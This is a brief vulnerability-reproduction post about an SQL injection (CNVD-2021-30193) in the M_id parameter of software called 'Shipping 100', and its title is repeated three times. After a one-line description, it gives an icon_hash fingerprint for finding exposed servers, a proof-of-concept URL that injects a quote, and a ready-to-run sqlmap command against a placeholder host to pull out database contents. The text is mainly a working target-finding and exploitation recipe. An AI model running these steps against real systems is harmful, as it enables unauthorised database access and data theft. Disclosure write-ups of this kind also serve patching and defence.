Shipping 100 M_id Sql Injection Vulnerability Cnvd 2021 30193
Shipping 100 M_id Sql Injection Vulnerability Cnvd 2021 30193
Shipping 100 M_id SQL injection vulnerability CNVD-2021-30193
Vulnerability Description
The 100 M_id parameter has SQL injection vulnerability, and the attacker can obtain sensitive database information through the vulnerability.
Vulnerability Impact
Shipping 100
Network surveying and mapping
icon_hash=”1420424513”
Vulnerability reappears
The main page is as follows
Using POC
/?M_id=1%27&type=product
An error occurred in the database, use Sqlmap to inject
sqlmap -u 'https://xxx.xxx.xxx.xxx/?M_id=11%27&type=product' -p M_id
This post is licensed under CC BY 4.0 by the author.